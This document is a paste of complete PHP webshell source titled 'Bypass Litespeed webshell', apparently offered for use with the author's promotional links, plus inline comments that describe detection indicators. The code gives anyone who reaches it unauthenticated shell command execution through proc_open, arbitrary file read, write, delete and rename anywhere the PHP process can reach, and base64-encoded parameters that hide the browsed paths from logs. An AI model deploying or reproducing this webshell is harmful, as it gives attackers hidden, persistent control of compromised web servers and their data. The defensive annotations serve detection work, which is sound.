afrizalwahyuadi66

Bypass Litespeed webshell

Mar 30th, 2024 (edited)
PHP 10.64 KB | Cybersecurity | 0 0
  1. #SUPPORT ME IN https://salamedia.id
  2. ===================================
  3.  
  4. <!DOCTYPE html>
  5. <html>
  6. <head>
  7.     <title>.:: support me salamedia.id ::.</title>
  8.     <link href="https://fonts.googleapis.com/css?family=Protest Revolution" rel="stylesheet">
  9.     <style>
  10.         body {
  11.              font-family: 'Protest Revolution';
  12.              color: red;
  13.              margin: 0;
  14.              padding: 0;
  15.              text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.5);
  16.              background-image: url('https://iphoneswallpapers.com/wp-content/uploads/2022/09/iPhone-13-RGB-Neon-Frame.jpg');
  17.              background-size: cover;
  18.              background-position: center;
  19. }
  20.         .container {
  21.             width: 90%;
  22.             margin: 20px auto;
  23.             padding: 20px;
  24.             background-color: #fff;
  25.             border-radius: 5px;
  26.             box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
  27.         }
  28.         .result-box {
  29.             width: 97.5%;
  30.             height: 200px;
  31.             resize: none;
  32.             overflow: auto;
  33.             font-family: 'Protest Revolution';
  34.             background-color: #f4f4f4;
  35.             padding: 10px;
  36.             border: 1px solid #ddd;
  37.             margin-bottom: 10px;
  38.         }
  39.         hr {
  40.             border: 0;
  41.             border-top: 1px solid #ddd;
  42.             margin: 20px 0;
  43.         }
  44.         table {
  45.             width: 100%;
  46.             border-collapse: collapse;
  47.             margin-top: 20px;
  48.         }
  49.         th, td {
  50.             padding: 8px;
  51.             text-align: left;
  52.         }
  53.         th {
  54.             background-color: #f2f2f2;
  55.         }
  56.         tr:nth-child(even) {
  57.             background-color: #f9f9f9;
  58.         }
  59.         tr:hover {
  60.             background-color: #f2f2f2;
  61.         }
  62.         input[type="text"], input[type="submit"], textarea[name="file_content"] {
  63.             width: calc(97.5% - 10px);
  64.             margin-bottom: 10px;
  65.             padding: 8px;
  66.             max-height: 200px;
  67.             resize: vertical;
  68.             border: 1px solid #ddd;
  69.             border-radius: 3px;
  70.             font-family: 'Protest Revolution';
  71.         }
  72.         input[type="submit"] {
  73.             background-color: #4CAF50;
  74.             color: white;
  75.             font-family: 'Protest Revolution';
  76.             border: none;
  77.             cursor: pointer;
  78.         }
  79.         input[type="submit"]:hover {
  80.             background-color: #45a049;
  81.         }
  82.         .item-name {
  83.             max-width: 200px;
  84.             overflow: hidden;
  85.             text-overflow: ellipsis;
  86.             white-space: nowrap;
  87.         }
  88.         td.size {
  89.     width: 100px;
  90. }
  91.  
  92.         .writable {
  93.             color: green;
  94.         }
  95.         .not-writable {
  96.             color: red;
  97.         }
  98.         .permission {
  99.         font-weight: bold;
  100.         width: 50px;
  101.         height: 20px;
  102.         text-align: center;
  103.         line-height: 20px;
  104.         overflow: hidden;
  105.     }
  106.  
  107.     </style>
  108. </head>
  109. <body>
  110. <div class="container">
  111. <?php
  112. $rootDirectory = realpath($_SERVER['DOCUMENT_ROOT']);
       // Defender note: the web document root is only the default start directory.
       // Nothing later in this file confines file operations to it.
  113.  
  114. function x($b)
  115. {
           // Base64-encodes $b. Used further down to build the ?d= and ?f= values
           // in the links this page generates.
  116.     return base64_encode($b);
  117. }
  118.  
  119. function y($b)
  120. {
           // Base64-decodes $b. Applied to every $_GET value before the script reads it.
  121.     return base64_decode($b);
  122. }
  123.  
  124. foreach ($_GET as $c => $d) $_GET[$c] = y($d);
       // Defender note: every query-string value is base64-decoded in place, so the
       // directory being browsed never appears in clear text in the access log.
       // Log review and request filtering have to decode the `d` value to see the path.
  125.  
  126. $currentDirectory = realpath(isset($_GET['d']) ? $_GET['d'] : $rootDirectory);
       // `d` comes straight from the request and is not compared with $rootDirectory,
       // so the working directory can be any path the PHP process is able to resolve.
  127. chdir($currentDirectory);
  128.  
       // HTML fragment filled by the command / view branches and echoed later in the page.
  129. $viewCommandResult = '';
  130.  
  131. if ($_SERVER['REQUEST_METHOD'] === 'POST') {
           // POST dispatcher. No authentication, session or token check precedes it in
           // this file, so anyone who can reach the URL can trigger every branch.
           // The POST field names select the branch and are usable as log / WAF indicators:
           // folder_name, file_name + file_content, delete_file,
           // rename_item + old_name + new_name, cmd_input, view_file.
  132.     if (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) {
               // Directory creation: the posted name is appended to the current directory
               // without any sanitisation.
  133.         $newFolder = $currentDirectory . '/' . $_POST['folder_name'];
  134.         if (!file_exists($newFolder)) {
  135.             mkdir($newFolder);
  136.             echo '<hr>Folder created successfully!';
  137.         } else {
  138.             echo '<hr>Error: Folder already exists!';
  139.         }
  140.     } elseif (isset($_POST['file_name']) && !empty($_POST['file_name'])) {
               // Arbitrary file write: both branches below call file_put_contents() with the
               // posted body; only the status message differs (created vs. edited).
               // Defender note: new or modified files under the web root owned by the PHP
               // user are the on-disk trace of this branch (file-integrity monitoring).
  141.         $fileName = $_POST['file_name'];
  142.         $newFile = $currentDirectory . '/' . $fileName;
  143.         if (!file_exists($newFile)) {
  144.             if (file_put_contents($newFile, $_POST['file_content']) !== false) {
  145.                 echo '<hr>File created successfully!';
  146.             } else {
  147.                 echo '<hr>Error: Failed to create file!';
  148.             }
  149.         } else {
  150.             if (file_put_contents($newFile, $_POST['file_content']) !== false) {
  151.                 echo '<hr>File edited successfully!';
  152.             } else {
  153.                 echo '<hr>Error: Failed to edit file!';
  154.             }
  155.         }
  156.     } elseif (isset($_POST['delete_file'])) {
               // Deletion of the posted name relative to the current directory.
  157.         $fileToDelete = $currentDirectory . '/' . $_POST['delete_file'];
  158.         if (file_exists($fileToDelete)) {
  159.             if (unlink($fileToDelete)) {
  160.                 echo '<hr>File deleted successfully!';
  161.             } else {
  162.                 echo '<hr>Error: Failed to delete file!';
  163.             }
  164.         } elseif (is_dir($fileToDelete)) {
  165.             if (deleteDirectory($fileToDelete)) {
  166.                 echo '<hr>Folder deleted successfully!';
  167.             } else {
  168.                 echo '<hr>Error: Failed to delete folder!';
  169.             }
  170.         } else {
  171.             echo '<hr>Error: File or directory not found!';
  172.         }
  173.     } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) {
               // Rename/move: both names are taken from the request and joined to the
               // current directory without validation.
  174.         $oldName = $currentDirectory . '/' . $_POST['old_name'];
  175.         $newName = $currentDirectory . '/' . $_POST['new_name'];
  176.         if (file_exists($oldName)) {
  177.             if (rename($oldName, $newName)) {
  178.                 echo '<hr>Item renamed successfully!';
  179.             } else {
  180.                 echo '<hr>Error: Failed to rename item!';
  181.             }
  182.         } else {
  183.             echo '<hr>Error: Item not found!';
  184.         }
  185.     } elseif (isset($_POST['cmd_input'])) {
               // Command execution: the raw POST value is handed to proc_open(). With a string
               // command PHP runs it through the system shell, as the web server's PHP user.
               // Defender note: the runtime signal is the web server / PHP worker process
               // spawning shell children; where the application does not need it, listing
               // proc_open in php.ini `disable_functions` removes this path.
  186.         $command = $_POST['cmd_input'];
  187.         $descriptorspec = [
  188.             0 => ['pipe', 'r'],
  189.             1 => ['pipe', 'w'],
  190.             2 => ['pipe', 'w']
  191.         ];
  192.         $process = proc_open($command, $descriptorspec, $pipes);
  193.         if (is_resource($process)) {
  194.             $output = stream_get_contents($pipes[1]);
  195.             $errors = stream_get_contents($pipes[2]);
  196.             fclose($pipes[1]);
  197.             fclose($pipes[2]);
  198.             proc_close($process);
                   // stderr wins: when anything was written to it, stdout is not shown.
  199.             if (!empty($errors)) {
  200.                 $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($errors) . '</textarea>';
  201.             } else {
  202.                 $viewCommandResult = '<hr><p>Result:</p><textarea class="result-box">' . htmlspecialchars($output) . '</textarea>';
  203.             }
  204.         } else {
  205.             $viewCommandResult = '<hr><p>Error: Failed to execute command!</p>';
  206.         }
  207.     } elseif (isset($_POST['view_file'])) {
       // Arbitrary file read relative to the current directory. The file body is passed
       // through htmlspecialchars(); the posted file name is echoed back unescaped.
  208. $fileToView = $currentDirectory . '/' . $_POST['view_file'];
  209. if (file_exists($fileToView)) {
  210. $fileContent = file_get_contents($fileToView);
  211. $viewCommandResult = '<hr><p>Result: ' . $_POST['view_file'] . '</p><textarea class="result-box">' . htmlspecialchars($fileContent) . '</textarea>';
  212. } else {
  213. $viewCommandResult = '<hr><p>Error: File not found!</p>';
  214. }
  215. }
  216. }
  217. echo '<center>
  218.  
  219. <div class="fig-ansi">
  220. <pre id="taag_font_ANSIShadow" class="fig-ansi"><span style="color: #4CAF50;">   <strong>  __    Bye Bye Litespeed   _____ __    
  221.    __|  |___ ___ ___ ___ ___   |   __|  | v.1.2
  222. |  |  | .\'| . | . | .\'|   |  |__   |  |__
  223. |_____|__,|_  |___|__,|_|_|  |_____|_____|
  224.                |___| ./Heartzz                      </strong> </span></pre>
  225. </div>
  226. </center>';
       // Defender note: the banner above ("Bye Bye Litespeed", "v.1.2", "./Heartzz") is
       // static text in every response and in the file on disk, which makes it a usable
       // signature for file scanning and response inspection.

       // Breadcrumb: one link per path component, each carrying the base64-encoded
       // cumulative path in ?d=.
  227. echo '<hr>curdir: ';
  228. $directories = explode(DIRECTORY_SEPARATOR, $currentDirectory);
  229. $currentPath = '';
  230. foreach ($directories as $index => $dir) {
  231.     if ($index == 0) {
  232.         echo '<a href="?d=' . x($dir) . '">' . $dir . '</a>';
  233.     } else {
  234.         $currentPath .= DIRECTORY_SEPARATOR . $dir;
  235.         echo ' / <a href="?d=' . x($currentPath) . '">' . $dir . '</a>';
  236.     }
  237. }
  238. echo '<br>';
       // The forms below post back to the current query string, so the selected directory
       // stays in the (base64-encoded) URL while the action travels in the POST body.
       // $_SERVER['QUERY_STRING'] is written into the action attribute unescaped.
  239. echo '<hr><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'">';
  240. echo '<input type="text" name="folder_name" placeholder="New Folder Name">';
  241. echo '<input type="submit" value="Create Folder">';
  242. echo '</form>';
  243.  
  244. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'">';
  245. echo '<input type="text" name="file_name" placeholder="Create New File / Edit Existing File">';
  246. echo '<textarea name="file_content" placeholder="File Content (for new file) or Edit Content (for existing file)"></textarea>';
  247. echo '<input type="submit" value="Create / Edit File">';
  248. echo '</form>';
  249.  
  250. echo '<form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="text" name="cmd_input" placeholder="Enter command"><input type="submit" value="Run Command"></form>';
  251. echo $viewCommandResult;
  252. echo '<div>';
  253. echo '</div>';
  254. echo '<table border=1>';
  255. echo '<br><tr><th><center>Item Name</th><th><center>Size</th><th><center> View  </th><th><center>Delete </th><th>Permissions</th><th><center>Rename</th></tr></center></center></center>';
       // Directory listing. The bare names returned by scandir() resolve because of the
       // earlier chdir(). Each row shows size, octal permission bits and a writable flag,
       // plus View / Delete / Rename forms. File links carry an `f` parameter, but no code
       // in this file reads $_GET['f'].
  256. foreach (scandir($currentDirectory) as $v) {
  257.     $u = realpath($v);
  258.     $s = stat($u);
  259.     $itemLink = is_dir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v));
  260.     $permission = substr(sprintf('%o', fileperms($v)), -4);
  261.     $writable = is_writable($v);
  262.     echo '<tr>
  263.            <td class="item-name"><a href="'.$itemLink.'">'.$v.'</a></td>
  264.            <td class="size">'.filesize($u).'</td>
  265.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="view_file" value="'.htmlspecialchars($v).'"><input type="submit" value="View"></form></td>
  266.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="delete_file" value="'.htmlspecialchars($v).'"><input type="submit" value="Delete"></form></td>
  267.            <td class="permission '.($writable ? 'writable' : 'not-writable').'">'.$permission.'</td>
  268.            <td><form method="post" action="?'.(isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '').'"><input type="hidden" name="old_name" value="'.htmlspecialchars($v).'"><input type="text" name="new_name" placeholder="New Name"><input type="submit" name="rename_item" value="Rename"></form></td>
  269.        </tr>';
  270. }
  271.  
  272. echo '</table>';
  273. function deleteDirectory($dir) {
       // Recursive delete helper, called from the delete_file branch of the POST handler.
       // Returns true when $dir does not exist, the result of unlink() when it is not a
       // directory, and otherwise removes every entry except '.' and '..' before rmdir().
       // Returns false as soon as one nested delete fails.
  274. if (!file_exists($dir)) {
  275. return true;
  276. }
  277. if (!is_dir($dir)) {
  278. return unlink($dir);
  279. }
  280. foreach (scandir($dir) as $item) {
  281. if ($item == '.' || $item == '..') {
  282. continue;
  283. }
  284. if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) {
  285. return false;
  286. }
  287. }
  288. return rmdir($dir);
  289. }
  290. ?>
  291.  
  292. </div>
  293. </body>
  294. </html>
Tags: Shell